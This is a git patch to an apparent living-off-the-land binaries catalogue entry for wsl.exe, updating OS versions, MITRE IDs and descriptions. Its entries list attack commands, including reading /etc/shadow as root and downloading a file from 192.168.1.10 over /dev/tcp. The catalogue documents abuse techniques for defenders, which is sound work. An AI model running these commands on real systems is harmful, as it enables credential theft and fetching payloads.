From 03b527b10539dacc793624210cbc2272f135b4ea Mon Sep 17 00:00:00 2001
From: unrooted <konrad.root.klawikowski@gmail.com>
Date: Fri, 7 Jun 2024 00:42:25 +0200
Subject: [PATCH] Update wsl.exe description (#378)

Co-authored-by: Wietze <wietze@users.noreply.github.com>
---
 yml/OtherMSBinaries/Wsl.yml | 22 ++++++++--------------
 1 file changed, 8 insertions(+), 14 deletions(-)

diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml
index e1a5bda..e1493d1 100644
--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -10,35 +10,28 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
   - Command: wsl.exe -u root -e cat /etc/shadow
     Description: Cats /etc/shadow file as root
     Usecase: Performs execution of arbitrary Linux commands as root without need for password.
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
-  - Command: wsl.exe --exec bash -c 'cat file'
-    Description: Cats /etc/shadow file as root
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
+  - Command: wsl.exe --exec bash -c "<command>"
+    Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
     Usecase: Performs execution of arbitrary Linux commands.
     Category: Execute
     Privileges: User
     MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
-  - Command: wsl.exe --system calc.exe
-    Description: Execute the command as root
-    Usecase: Performs execution of arbitrary Linux commands as root without need for password.
-    Category: Execute
-    Privileges: User
-    MitreID: T1202
-    OperatingSystem: Windows 11
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
   - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
     Description: Downloads file from 192.168.1.10
     Usecase: Download file
     Category: Download
     Privileges: User
-    MitreID: T1202
-    OperatingSystem: Windows 10, Windows 19 Server
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\wsl.exe
 Code_Sample:
@@ -59,3 +52,4 @@ Acknowledgement:
     Handle: '@d1r4c'
   - Person: Nasreddine Bencherchali
     Handle: '@nas_bench'
+  - Person: Konrad 'unrooted' Klawikowski